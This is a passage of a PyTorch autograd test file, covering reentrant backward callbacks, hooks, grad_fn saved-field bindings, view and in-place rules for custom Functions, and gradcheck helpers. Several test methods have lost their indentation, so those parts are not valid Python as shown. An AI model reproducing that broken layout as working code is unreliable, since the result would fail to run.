mean_combined.backward()
def test_checkpoint_valid_reset_on_error(self):
a = torch.randn(2, 2, requires_grad=True)
with self.assertRaisesRegex(Exception, "Checkpointing is not compatible with .grad()"):
b = checkpoint(torch.exp, a).sum()
torch.autograd.grad(b, (a,))
c = checkpoint(torch.exp, a).sum()
c.backward()
    def _test_reentrant_with_callbacks(self, install_callbacks_in_depths):
        # Helper: runs a reentrant backward and installs engine callbacks at
        # the requested nesting depths (0 = outer backward, 1 = inner,
        # reentrant backward). Returns the per-depth invocation counts so
        # callers can assert each callback fired exactly once.
        counter = {}
        counter["inner"] = 0
        counter["outer"] = 0
        def inc_inner_counter():
            counter["inner"] += 1
        def inc_outer_counter():
            counter["outer"] += 1
        class MyFunc(Function):
            @staticmethod
            def forward(ctx, input):
                return input
            @staticmethod
            @once_differentiable
            def backward(ctx, input):
                if 1 in install_callbacks_in_depths:
                    # Add a callback to execute.
                    Variable._execution_engine.queue_callback(inc_inner_counter)
                return input
        class MyReentrantFunc(Function):
            @staticmethod
            def forward(ctx, input):
                return input
            @staticmethod
            @once_differentiable
            def backward(ctx, input):
                if 0 in install_callbacks_in_depths:
                    # Add a callback to execute.
                    Variable._execution_engine.queue_callback(inc_outer_counter)
                # Reentrant backward call.
                tmp_inp = input.detach().requires_grad_()
                with torch.enable_grad():
                    tmp_out = (MyFunc.apply(tmp_inp)).sum()
                tmp_out.backward()
                return input
        t1 = torch.rand((3, 3), requires_grad=True)
        t2 = MyReentrantFunc.apply(t1)
        t3 = t2.sum()
        torch.autograd.backward([t3])
        return counter
def test_reentrant_with_callbacks_depth_0(self):
# Verify callback is called only once.
ret = self._test_reentrant_with_callbacks([0])
self.assertEqual(1, ret["outer"])
self.assertEqual(0, ret["inner"])
def test_reentrant_with_callbacks_depth_1(self):
# Verify callback is called only once.
ret = self._test_reentrant_with_callbacks([1])
self.assertEqual(0, ret["outer"])
self.assertEqual(1, ret["inner"])
def test_reentrant_with_callbacks_both_depths(self):
# Verify callback is called twice.
ret = self._test_reentrant_with_callbacks([0, 1])
self.assertEqual(1, ret["outer"])
self.assertEqual(1, ret["inner"])
def test_reentrant_with_leaf_variable_hook(self):
handle = None
param = torch.rand(10, requires_grad=True)
def add_gradient_penalty_to_grad(grad):
handle.remove()
old_param_grad = grad
param.grad = None
# Add some sort of gradient penalty by directly updating the gradients
with torch.enable_grad():
g = grad.detach().requires_grad_()
new_param = param.detach().requires_grad_()
out = ((g * 2) + new_param).sum()
out.backward()
res = g.grad + grad
param.grad = old_param_grad
return res
handle = param.register_hook(add_gradient_penalty_to_grad)
# Forward pass
tmp = (param * param)
loss = tmp.sum()
# Compute the gradients
loss.backward()
def test_reentrant_with_non_leaf_variable_hook(self):
handle = None
param = torch.rand(10, requires_grad=True)
def manual_increase_gradient(grad):
handle.remove()
# Add some sort of gradient penalty by directly updating the gradients
with torch.enable_grad():
g = grad.detach().requires_grad_()
out = ((g * 2) + 5).sum()
out.backward()
res = g.grad + grad
return res
# Forward pass
tmp = (param * param)
handle = tmp.register_hook(manual_increase_gradient)
loss = tmp.sum()
# Compute the gradients
loss.backward()
self.assertEqual(param.grad, 6 * param)
    def test_grad_fn_attr_bindings(self):
        # Check that the getter of each type returns what we want
        # See `gen_autograd_functions.py` for how the getters are generated
        #
        # This test is only meant to check if the codegen'd bindings work
        # Please help update this test if you update the names of any the fields we check!
        #
        a = torch.ones(1, requires_grad=True)
        b = torch.ones(1, requires_grad=True)
        out = torch.stack([a, b], dim=0)
        self.assertEqual(out.grad_fn._saved_tensors, (a, b))              # TensorList -> Tuple[Tensor]
        self.assertIsInstance(out.grad_fn._saved_tensors[0], torch.Tensor)
        self.assertEqual(out.grad_fn._saved_dim, 0)                       # int64_t -> int
        self.assertIsInstance(out.grad_fn._saved_dim, int)
        # After backward, saved tensors are freed; accessing them must raise,
        # while non-tensor saved fields remain readable.
        out.sum().backward()
        with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
            out.grad_fn._saved_tensors
        self.assertEqual(out.grad_fn._saved_dim, 0)
        a = torch.ones(2, 2, requires_grad=True)
        indices = torch.tensor([0, 1])
        out = a[:, indices]
        self.assertEqual(out.grad_fn._saved_indices, (None, indices))     # c10::List<c10::optional<Tensor>> -> Tuple[Tensor?]
        self.assertIsInstance(out.grad_fn._saved_indices[1], torch.Tensor)
        self.assertEqual(out.grad_fn._saved_self_sizes, a.shape)          # IntArrayRef -> Tuple[int]
        self.assertIsInstance(out.grad_fn._saved_self_sizes[0], int)
        a = torch.ones(1, 1, 2, requires_grad=True)
        out = torch.nn.functional.interpolate(a, 4, mode="linear")
        self.assertEqual(out.grad_fn._saved_output_size, (4,))            # c10::optional<IntArrayRef> -> int[]?
        self.assertIsInstance(out.grad_fn._saved_output_size[0], int)
        self.assertEqual(out.grad_fn._saved_align_corners, False)         # bool -> bool
        self.assertIsInstance(out.grad_fn._saved_align_corners, bool)
        self.assertIsNone(out.grad_fn._saved_scale_factors)               # c10::optional<ArrayRef<double>> -> float[]?
        out = torch.nn.functional.interpolate(a, scale_factor=0.5, mode="linear")
        self.assertIsNone(out.grad_fn._saved_output_size)
        self.assertEqual(out.grad_fn._saved_scale_factors, (0.5,))
        self.assertIsInstance(out.grad_fn._saved_scale_factors[0], float)
        a = torch.ones(2, 2, requires_grad=True)
        out = torch.pdist(a, p=1)
        self.assertEqual(out.grad_fn._saved_p, 1.)                        # double -> float
        self.assertIsInstance(out.grad_fn._saved_p, float)
        a = torch.ones(1, 1, 2, requires_grad=True)
        out = torch.logit(a, 1.)
        self.assertEqual(out.grad_fn._saved_eps, 1.)                      # c10:optional<double> -> float?
        self.assertIsInstance(out.grad_fn._saved_eps, float)
        out = torch.logit(a)
        self.assertIsNone(out.grad_fn._saved_eps)
        # qr requires LAPACK support, so guard the std::string binding check.
        if torch._C.has_lapack:
            a = torch.ones(1, 1, requires_grad=True)
            q, r = torch.linalg.qr(a, mode="reduced")
            self.assertEqual(q.grad_fn._saved_mode, "reduced")            # std::string -> str
        a = torch.tensor([1.], requires_grad=True)
        out = torch.div(a, 2., rounding_mode="trunc")
        self.assertEqual(out.grad_fn._saved_rounding_mode, "trunc")       # c10::optional<std::string> -> str?
        out = torch.div(a, 2., rounding_mode=None)
        self.assertIsNone(out.grad_fn._saved_rounding_mode)               # c10::optional<std::string> -> str?
        # Scalar saved fields preserve the Python numeric type they were
        # constructed with (complex/float/int/bool).
        x = torch.zeros(5, requires_grad=True)
        out = torch.threshold(x, threshold=(1 + 0j), value=(1 + 0j))
        self.assertIsInstance(out.grad_fn._saved_threshold, complex)      # Scalar(complex double) -> complex
        cfloat = torch.tensor(1 + 0j, dtype=torch.complex64)
        out = torch.threshold(x, threshold=cfloat, value=(1 + 0j))
        self.assertIsInstance(out.grad_fn._saved_threshold, complex)      # Scalar(complex float) -> complex
        out = torch.threshold(x, threshold=1., value=1.)
        self.assertIsInstance(out.grad_fn._saved_threshold, float)        # Scalar(floating point) -> float
        out = torch.threshold(x, threshold=1, value=1)
        self.assertIsInstance(out.grad_fn._saved_threshold, int)          # Scalar(integral) -> int
        out = torch.threshold(x, threshold=False, value=False)
        self.assertIsInstance(out.grad_fn._saved_threshold, bool)         # Scalar(bool) -> bool
        a = torch.ones(2, 2, requires_grad=True)
        out = a.as_strided((3,), (1,), 1)
        self.assertEqual(out.grad_fn._saved_storage_offset, 1)            # c10:optional<int64_t> -> int?
        self.assertIsInstance(out.grad_fn._saved_storage_offset, int)
        out = a.as_strided((3,), (1,))
        self.assertIsNone(out.grad_fn._saved_storage_offset)
        a = torch.ones(2, requires_grad=True)
        out = torch.tanh(a)
        self.assertEqual(out, out.grad_fn._saved_result)                  # saved variable when output
        a = torch.randn(3, 5, requires_grad=True)
        b = torch.tensor([1, 0, 4])
        loss = nn.NLLLoss()
        out = loss(a, b)
        self.assertIsNone(out.grad_fn._saved_weight)
        loss = nn.NLLLoss(weight=torch.ones((5,)))
        out = loss(a, b)
        self.assertEqual(out.grad_fn._saved_weight, torch.ones((5,)))     # c10:optional<Tensor> -> Tensor?
        # Optional saved tensors are freed after backward too.
        out.sum().backward()
        with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
            out.grad_fn._saved_weight
    def test_autograd_views_codegen(self):
        # This is not necessarily the absolute correct behavior, but this is the current
        # one. This test is here to make sure that any change to this behavior is detected
        # and not silent. The TODOs below mark the places with unexpected behavior.
        # Note that any change in these test will be BC-breaking and should be done carefully.
        # This test checks the behavior of two codegen functions (view_as and unbind)
        # with respect to view tracking and inplace operation on the output.
        def run_test(grad_mode, requires_grad, is_view, should_raise_tuple):
            # should_raise is either None (no error expected) or the expected
            # RuntimeError message substring.
            def maybe_check_raise(fn, should_raise):
                self.assertTrue(should_raise is None or isinstance(should_raise, str))
                if should_raise is not None:
                    with self.assertRaisesRegex(RuntimeError, should_raise):
                        fn()
                else:
                    fn()
            # Single-output view function: view_as
            inp = torch.rand(2, requires_grad=requires_grad).clone()
            with torch.set_grad_enabled(grad_mode):
                out = inp.view_as(inp)
            # Are they differentiable views?
            self.assertTrue(out._is_view() == is_view)
            # Are inplace allowed?
            maybe_check_raise(lambda: out.add_(1), should_raise_tuple[0])
            # Multi-output view function: unbind
            inp = torch.rand(2, requires_grad=requires_grad).clone()
            with torch.set_grad_enabled(grad_mode):
                out = inp.unbind()
            # Are they differentiable views?
            self.assertTrue(out[0]._is_view() == is_view)
            self.assertTrue(out[1]._is_view() == is_view)
            # Are inplace allowed?
            maybe_check_raise(lambda: out[0].add_(1), should_raise_tuple[1])
            maybe_check_raise(lambda: out[1].add_(1), should_raise_tuple[2])
        # should_raise contains None if it should not raise
        # should_raise contains a string of the error if it should raise
        # The 3 elements are for view_as, first output of unbind and second output of unbind
        run_test(grad_mode=True, requires_grad=False, is_view=True,
                 should_raise_tuple=(None, None, None))
        inp_change_err = "Output {} of UnbindBackward is a view and is being modified inplace."
        run_test(grad_mode=True, requires_grad=True, is_view=True,
                 should_raise_tuple=(None, inp_change_err.format("0"), inp_change_err.format("1")))
        leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
        run_test(grad_mode=False, requires_grad=True, is_view=True,
                 should_raise_tuple=(leaf_grad_err, leaf_grad_err, leaf_grad_err))
        run_test(grad_mode=False, requires_grad=False, is_view=True,
                 should_raise_tuple=(None, None, None))
def test_inplace_not_requires_grad(self):
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, inp):
return inp.view_as(inp)
@staticmethod
def backward(ctx, grad):
return grad
# Original Tensor does not require grad
a = torch.rand(1, 2)
# Tensor being written does require grad
b = torch.rand(1, requires_grad=True)
# Take an invalid view on 'a' that should raise an error (warns during deprecation)
view_a = MyFn.apply(a)
with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
view_a += b
# Extra test for copy_ that is a manual implementation and could be easily
# forgotten when the codegen is updated (warns during deprecation)
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
view_a = MyFn.apply(a)
with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
view_a.copy_(b)
# Functions that should throw must properly throw
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
view_a = a.unbind()[0]
with self.assertRaisesRegex(RuntimeError, "This view is the output of a function that returns "
"multiple views."):
view_a.copy_(b)
# Sanity check that views that should work still work
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
a.select(1, 0).copy_(b)
    def _do_test_autograd_simple_views_python(self, dtype):
        # This is not necessarily the absolute correct behavior, but this is the current
        # one. This test is here to make sure that any change to this behavior is detected
        # and not silent. The TODOs below mark the places with unexpected behavior.
        # Note that any change in these test will be BC-breaking and should be done carefully.
        # This checks the autograd.Function behavior when we return one or multiple outputs
        # while one of these is an input, a view of an input or of a temporary tensor.
        # This indicator is used to track how many times the backward function was called
        bw_called = [0]
        # This indicator is used to check if the argument `ga` contains non-zero values
        ga_nz = [False]
        # Returns either a view of the input or a clone, depending on make_view.
        class IdOneOutput(Function):
            @staticmethod
            def forward(ctx, a, b, make_view):
                if make_view:
                    a = a.narrow(0, 0, 2)
                else:
                    a = a.clone()
                return a
            @staticmethod
            def backward(ctx, ga):
                bw_called[0] += 1
                return ga, None, None
        # Same, but returns a second (non-view) output as well.
        class IdTwoOutput(Function):
            @staticmethod
            def forward(ctx, a, b, make_view):
                if make_view:
                    a = a.narrow(0, 0, 2)
                else:
                    a = a.clone()
                return a, a + b
            @staticmethod
            def backward(ctx, ga, gab):
                bw_called[0] += 1
                if ga.eq(0).all():
                    ga_nz[0] = False
                else:
                    ga_nz[0] = True
                return ga + gab, gab, None
        # Returns a view of a temporary tensor created inside forward.
        class ViewOfTemp(Function):
            @staticmethod
            def forward(ctx, a, make_view):
                ctx.save_for_backward(a)
                if make_view:
                    a = a.narrow(0, 0, 2)
                else:
                    a = a.clone()
                b = a.clone()
                return b.select(0, 0)
            @staticmethod
            def backward(ctx, grad):
                bw_called[0] += 1
                a, = ctx.saved_tensors
                res = torch.zeros_like(a)
                res.select(0, 0).copy_(grad)
                return res, None
        # Expected error messages when modifying each kind of output inplace.
        fn_id_to_inplace_view_err_msg = {
            "one_output": ("Output 0 of IdOneOutputBackward is a view and is being "
                           "modified inplace. This view was created inside a custom Function"),
            "two_output": ("Output 0 of IdTwoOutputBackward is a view and is being modified inplace."
                           " This view is the output of a function that returns multiple views."),
            "view_of_temp": ("Output 0 of ViewOfTempBackward is a view and is being "
                             "modified inplace. This view was created inside a custom Function")
        }
        for fn_id in ["one_output", "two_output", "view_of_temp"]:
            for inplace in [True, False]:
                for make_view in [True, False]:
                    # Used for special casing the tests below
                    output_is_a_view = (make_view or fn_id == "view_of_temp")
                    def fn(a, b):
                        # never modify a, b inplace for gracheck
                        a = a.clone()
                        b = b.clone()
                        if fn_id == "two_output":
                            tmp1, tmp2 = IdTwoOutput.apply(a, b, make_view)
                            if inplace:
                                tmp1 += 3
                                tmp2 += 3
                            else:
                                tmp1 = tmp1 + 3
                                tmp2 = tmp2 + 3
                            tmp = tmp1 * tmp2
                        else:
                            if fn_id == "one_output":
                                tmp = IdOneOutput.apply(a, b, make_view)
                            else:
                                tmp = ViewOfTemp.apply(a + b, make_view)
                            if inplace:
                                tmp += 3
                            else:
                                tmp = tmp + 3
                        return tmp.sum()
                    a = torch.ones(2, dtype=dtype, requires_grad=True)
                    b = torch.ones(2, dtype=dtype, requires_grad=True)
                    err_msg = fn_id_to_inplace_view_err_msg[fn_id]
                    # gradcheck only for the combinations that do not raise
                    if not inplace or not output_is_a_view:
                        gradcheck(fn, (a, b), check_batched_grad=False)
                    # Was the custom backward called properly
                    bw_called[0] = 0
                    ga_nz[0] = True  # For the case where the backward is called
                    if inplace and output_is_a_view:
                        with self.assertRaisesRegex(RuntimeError, err_msg):
                            fn(a, b)
                    else:
                        fn(a, b).backward()
                    expected_called = 1
                    expected_ga_nz = True
                    # Inplace on a view output raises before backward can run
                    if output_is_a_view and inplace:
                        expected_called = 0
                    self.assertTrue(bw_called[0] == expected_called)
                    self.assertTrue(ga_nz[0] == expected_ga_nz)
def test_autograd_simple_views_python(self):
self._do_test_autograd_simple_views_python(torch.double)
self._do_test_autograd_simple_views_python(torch.cdouble)
    def test_autograd_complex_views_python(self):
        # This is not necessarily the absolute correct behavior, but this is the current
        # one. This test is here to make sure that any change to this behavior is detected
        # and not silent. The TODOs below mark the places with unexpected behavior.
        # Note that any change in these test will be BC-breaking and should be done carefully.
        # This checks that multiples views in the forward are properly traced and how they
        # behave with respect to inplace operations.
        # This indicator is used to track how many times the backward function was called
        bw_called = [0]
        class ComplexView(Function):
            @staticmethod
            def forward(ctx, a, idx):
                # Two chained view ops: narrow then select; only the final
                # `res` (a view of `a`) is returned.
                res = a.narrow(0, idx, 1)
                res = a.select(0, idx)
                ctx.save_for_backward(a)
                ctx.idx = idx
                return res
            @staticmethod
            def backward(ctx, grad):
                bw_called[0] += 1
                a, = ctx.saved_tensors
                res = torch.zeros_like(a)
                res.select(0, ctx.idx).copy_(grad)
                return res, None
        a = torch.ones(2, requires_grad=True)
        idx = 1
        # Plain backward through the custom view: backward called once.
        bw_called[0] = 0
        out = ComplexView.apply(a.clone(), idx)
        out.sum().backward()
        self.assertTrue(bw_called[0] == 1)
        # Inplace modification of the returned view must raise.
        out = ComplexView.apply(a.clone(), idx)
        with self.assertRaisesRegex(RuntimeError,
                                    "Output 0 of ComplexViewBackward is a view and is being modified inplace"):
            out += 1
    def test_autograd_inplace_views_python(self):
        # This is not necessarily the absolute correct behavior, but this is the current
        # one. This test is here to make sure that any change to this behavior is detected
        # and not silent. The TODOs below mark the places with unexpected behavior.
        # Note that any change in these test will be BC-breaking and should be done carefully.
        # This test checks custom autograd.Function that perform inplace operations
        bw_called = [0]
        # I) Single output
        class MyAdder(Function):
            @staticmethod
            def forward(ctx, a, b):
                a.add_(b)
                ctx.mark_dirty(a)
                return a
            @staticmethod
            def backward(ctx, grad):
                bw_called[0] += 1
                return grad, grad
        a = torch.ones(2, requires_grad=True)
        b = torch.ones(2, requires_grad=True)
        # No extra inplace
        c = MyAdder.apply(a.clone(), b)
        c.sum().backward()
        self.assertTrue(bw_called[0] == 1)
        # With extra inplace on the output
        bw_called[0] = 0
        c = MyAdder.apply(a.clone(), b)
        c += 2
        c.sum().backward()
        self.assertTrue(bw_called[0] == 1)
        # The input is a view
        bw_called[0] = 0
        c = MyAdder.apply(a.clone().view_as(a), b)
        c.sum().backward()
        self.assertTrue(bw_called[0] == 1)
        # Should not give non-inputs to mark_dirty
        class MyAdderBad(Function):
            @staticmethod
            def forward(ctx, a, b):
                c = 3 * a
                c.add_(b)
                ctx.mark_dirty(c)
                return c
            @staticmethod
            def backward(ctx, grad):
                bw_called[0] += 1
                grad = 3 * grad
                return grad, grad
        a = torch.ones(2, requires_grad=True)
        b = torch.ones(2, requires_grad=True)
        # Marking a fresh (non-input) tensor dirty only warns today.
        with warnings.catch_warnings(record=True) as w:
            MyAdderBad.apply(a.clone(), b)
        self.assertEqual(len(w), 1)
        # II) Multiple outputs
        class MyBadAdder(Function):
            @staticmethod
            def forward(ctx, a, b):
                a.add_(b)
                ctx.mark_dirty(a)
                return a, a + b
            @staticmethod
            def backward(ctx, ga, gab):
                bw_called[0] += 1
                return ga + gab, ga + gab
        # No extra inplace
        bw_called[0] = 0
        c, d = MyBadAdder.apply(a.clone(), b)
        (c * d).sum().backward()
        self.assertTrue(bw_called[0] == 1)
        # With extra inplace on the output
        bw_called[0] = 0
        c, d = MyBadAdder.apply(a.clone(), b)
        c += 2
        (c * d).sum().backward()
        self.assertTrue(bw_called[0] == 1)
        # The input is a view
        inplace_on_view_err = "your Function modifies inplace an input that is a view of another Tensor"
        with self.assertRaisesRegex(RuntimeError, inplace_on_view_err):
            c, d = MyBadAdder.apply(a.clone().view_as(a), b)
        # III) Inplace + other op
        class MyOutPlaceAdder(Function):
            @staticmethod
            def forward(ctx, a, b):
                a.add_(b)
                ctx.mark_dirty(a)
                # Dirty tensor `a` is NOT returned as-is — only a clone of it.
                return a.clone(), a + b
            @staticmethod
            def backward(ctx, ga, gab):
                bw_called[0] += 1
                return ga + gab, ga + 2 * gab
        # We don't reuse the input
        def fn(a, b):
            orig_a = a.clone().view_as(a)
            c, d = MyOutPlaceAdder.apply(orig_a, b)
            return (c * d).sum()
        bad_mark_dirty_err = "Some elements marked as dirty during the forward method were not returned as output."
        with self.assertRaisesRegex(RuntimeError, bad_mark_dirty_err):
            fn(a, b)
def test_named_tensor_for_complex_views(self):
names = ["batch", "height", "width", "complex"]
z = torch.ones((5, 12, 14, 2), requires_grad=True)
z_named = z.refine_names(*names)
z_complex = torch.view_as_complex(z_named.rename(None)).refine_names(*names[:-1])
z_complex.sum().backward()
self.assertEqual(z.grad, torch.view_as_real(torch.ones_like(z_complex).rename(None)))
def test_custom_function_return_view_in_nograd(self):
class Alias(Function):
@staticmethod
def forward(ctx, x):
return x[:]
@staticmethod
def backward(ctx, gx):
return gx
inp = torch.rand(2, requires_grad=True)
with torch.no_grad():
output = Alias.apply(inp)
with torch.no_grad():
expected_output = inp[:]
# Calling the custom function should operate as if we called an equivalent op
self.assertEqual(output.requires_grad, expected_output.requires_grad)
# Check that in-place modification on view throws
leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, leaf_grad_err):
output.zero_()
def test_grad_mode_restored_reentrant(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, go):
original = torch._C.is_grad_enabled()
with torch.enable_grad():
self.assertTrue(torch._C.is_grad_enabled())
foo = torch.rand(go.size(), requires_grad=True)
grad, = torch.autograd.grad(
foo ** 3, foo, grad_outputs=go
)
self.assertTrue(torch._C.is_grad_enabled())
self.assertTrue(torch._C.is_grad_enabled() == original)
return grad
inp = torch.rand(3, requires_grad=True)
# Case where original==False
MyFunction.apply(inp).sum().backward()
# Case where original==True
MyFunction.apply(inp).sum().backward(create_graph=True)
def test_power_function(self):
a = torch.tensor([0., 0., 0.])
b = torch.tensor([-1., 0., 1.], requires_grad=True)
c = torch.sum(a**b)
c.backward()
self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))
s = 0
b = torch.tensor([-1., 0., 1.], requires_grad=True)
c = torch.sum(s**b)
c.backward()
self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))
def test_nansum_with_nans(self):
a = torch.randn(2, 2, 2, 2, dtype=torch.double)
with torch.no_grad():
a[a < 0.2] = float('nan')
a.requires_grad = True
# No args
gradcheck(lambda x: x.nansum(), a)
gradgradcheck(lambda x: x.nansum(), a)
# Single dim
gradcheck(lambda x: x.nansum((0)), a)
gradgradcheck(lambda x: x.nansum((0)), a)
# Multi dim
gradcheck(lambda x: x.nansum((0, 2)), a)
gradgradcheck(lambda x: x.nansum((0, 2)), a)
gradcheck(lambda x: x.nansum((0, -1)), a)
gradgradcheck(lambda x: x.nansum((0, -1)), a)
# With keep-dim
gradcheck(lambda x: x.nansum((0, -1), True), a)
gradgradcheck(lambda x: x.nansum((0, -1), True), a)
def test_nansum_dtype(self):
inp = torch.randn(2, 2, 2, 2)
with torch.no_grad():
inp[inp < 0.2] = float('nan')
def test(inp, inp_dtype, out_dtype):
with torch.no_grad():
a = inp.to(inp_dtype)
a.requires_grad = True
b = torch.sum(a, dtype=out_dtype)
b.backward()
self.assertEqual(a.dtype, a.grad.dtype)
test(inp, torch.float, torch.double)
test(inp, torch.double, torch.float)
def test_nan_to_num(self):
a = torch.randn(3, 3, 3, 3, dtype=torch.double)
with torch.no_grad():
a[torch.rand_like(a) < 0.2] = float('nan')
a[torch.rand_like(a) < 0.2] = float('inf')
a[torch.rand_like(a) < 0.2] = -float('inf')
a.requires_grad = True
gradcheck(lambda x: x.nan_to_num(), a)
gradgradcheck(lambda x: x.nan_to_num(), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0, neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0, neginf=-2.0), a)
gradcheck(lambda x: x.nan_to_num(posinf=2.0, neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(posinf=2.0, neginf=-2.0), a)
gradcheck(lambda x: x.nan_to_num(neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(neginf=-2.0), a)
def test_custom_function_error(self):
class BadFw(Function):
@staticmethod
def backward(ctx, foo):
return foo
class BadBw(Function):
@staticmethod
def forward(ctx, foo):
return foo.clone()
inp = torch.rand(1, requires_grad=True)
with self.assertRaisesRegex(NotImplementedError, "must implement the forward"):
BadFw.apply(inp)
with self.assertRaisesRegex(RuntimeError, "must implement the backward"):
BadBw.apply(inp).sum().backward()
def test_custom_function_local_inplace(self):
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, inp, inplace):
view = inp.clone()[:3]
if inplace:
view += 2
return view
@staticmethod
def backward(ctx, grad):
return grad, None
base = torch.rand(10, requires_grad=True)
foo = MyFn.apply(base, False)
self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
foo = MyFn.apply(base, True)
self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
    def test_integer_outputs(self):
        """Ops with integer-valued outputs (argmax/argsort/bucketize/unique,
        ...) must never produce outputs that require grad, even when their
        inputs do."""
        inp = torch.rand(4, requires_grad=True)
        out = inp.argmax()
        self.assertFalse(out.dtype.is_floating_point)
        self.assertFalse(out.requires_grad)
        out = inp.argmin()
        self.assertFalse(out.dtype.is_floating_point)
        self.assertFalse(out.requires_grad)
        out = inp.argsort()
        self.assertFalse(out.dtype.is_floating_point)
        self.assertFalse(out.requires_grad)
        val = torch.rand((), requires_grad=True)
        out = torch.searchsorted(inp, val)
        self.assertFalse(out.dtype.is_floating_point)
        self.assertFalse(out.requires_grad)
        bins = torch.linspace(0, 1.0, steps=100, requires_grad=True)
        vals = torch.rand(5, 5, requires_grad=True)
        out = torch.bucketize(vals, bins)
        self.assertFalse(out.dtype.is_floating_point)
        self.assertFalse(out.requires_grad)
        val = torch.empty(5).requires_grad_()
        out = val.count_nonzero()
        self.assertFalse(out.requires_grad)
        # For the unique family only the first (values) output may require
        # grad; the inverse/counts outputs are integer and must not.
        def assert_only_first_requires_grad(res):
            if not isinstance(res, tuple):
                res = (res,)
            self.assertTrue(res[0].requires_grad)
            for out in res[1:]:
                if out is not None:
                    self.assertFalse(out.requires_grad)
        for sort in [True, False]:
            for return_inverse in [True, False]:
                for return_counts in [True, False]:
                    res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
                                       return_counts=return_counts)
                    assert_only_first_requires_grad(res)
                    res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
                                       return_counts=return_counts, dim=0)
                    assert_only_first_requires_grad(res)
                    res = torch.unique_consecutive(inp, return_inverse=return_inverse,
                                                   return_counts=return_counts)
                    assert_only_first_requires_grad(res)
                    res = torch.unique_consecutive(inp, return_inverse=return_inverse,
                                                   return_counts=return_counts, dim=0)
                    assert_only_first_requires_grad(res)
                    # Here we test the internal functions to make sure all of them are
                    # covered on top of the public API
                    res = torch._unique(inp, sorted=sort, return_inverse=return_inverse)
                    assert_only_first_requires_grad(res)
                    # This looks public but is actually manually deleted from the
                    # torch namespace in torch/functional.py
                    res = torch._VF.unique_dim(inp, dim=0, sorted=sort, return_inverse=return_inverse,
                                               return_counts=return_counts)
                    assert_only_first_requires_grad(res)
                    # We don't test `unique_dim_consecutive` here.
                    # It looks public but the python binding is actually manually disabled in
                    # tools/autograd/gen_python_functions.py
                    res = torch._unique2(inp, sorted=sort, return_inverse=return_inverse,
                                         return_counts=return_counts)
                    assert_only_first_requires_grad(res)
def index_perm_variable(shape, max_indices):
    """Return a LongTensor of the given ``shape`` holding distinct indices
    drawn without replacement from ``range(max_indices)``.

    ``shape`` may be an int or a tuple of ints; its total number of elements
    must not exceed ``max_indices``.
    """
    dims = shape if isinstance(shape, tuple) else (shape,)
    numel = reduce(mul, dims)
    # A prefix of a random permutation guarantees distinct entries.
    return torch.randperm(max_indices).narrow(0, 0, numel).view(dims)
def bernoulli_scalar():
    """Return a 0-dim ``uint8`` tensor containing a Bernoulli(0.5) draw."""
    out = torch.tensor(0, dtype=torch.uint8)
    return out.bernoulli_()
def gradgradcheck_method_precision_override(test_name):
    """Look up loosened (atol, rtol) tolerances for gradgradcheck on tests
    known to accumulate numerical error; return None when no override applies.

    Broadcast variants get their tolerances scaled up because error
    accumulates over the broadcast dimension(s).
    """
    # these are just empirical observations, we should improve
    empirical_overrides = {
        'test_norm': {'atol': 2e-2, 'rtol': 1e-2},
        'test_norm_1_5': {'atol': 1.5e-2, 'rtol': 1e-2},
        'test_norm_3': {'atol': 5e-2, 'rtol': 1e-2},
        'test_dist': {'atol': 5e-2, 'rtol': 1e-2},
        'test_dist_4': {'atol': 8e-2, 'rtol': 1e-2},
    }
    base_name = test_name.split("_broadcast")[0]
    override = empirical_overrides.get(base_name)
    if override is None:
        return None
    # NOTE(review): both scaled entries derive from the base *atol* (the base
    # rtol is ignored) — this matches the original behavior; confirm whether
    # it is intentional before changing it.
    if 'broadcast_lhs' in test_name or 'broadcast_rhs' in test_name:
        # errors accumulated across 1 dimension
        scale = S
    elif 'broadcast_all' in test_name:
        # errors accumulated across multiple dimensions
        scale = S * S
    else:
        return override
    return {'atol': override['atol'] * scale, 'rtol': override['atol'] * scale}
def run_grad_and_gradgrad_checks(test_case, name, test_name, apply_method, output_variable,
                                 input_variables, run_gradgradcheck=True, check_batched_grad=True):
    """gradcheck ``apply_method`` on ``input_variables``, then (unless the op
    or test is excluded) gradgradcheck it, applying any per-test precision
    override from ``gradgradcheck_method_precision_override``."""
    # First-order check always runs.
    test_case.assertTrue(gradcheck(apply_method, input_variables, eps=1e-6, atol=PRECISION,
                                   check_batched_grad=check_batched_grad))
    skip_second_order = (name in EXCLUDE_GRADGRADCHECK
                         or test_name in EXCLUDE_GRADGRADCHECK_BY_TEST_NAME)
    if skip_second_order:
        return
    override = gradgradcheck_method_precision_override(test_name)
    if override is None:
        ok = gradgradcheck(apply_method, input_variables,
                           gen_non_contig_grad_outputs=True,
                           check_batched_grad=check_batched_grad)
    else:
        ok = gradgradcheck(apply_method, input_variables, None,
                           atol=override['atol'], rtol=override['rtol'],
                           gen_non_contig_grad_outputs=True,
                           check_batched_grad=check_batched_grad)
    test_case.assertTrue(ok)
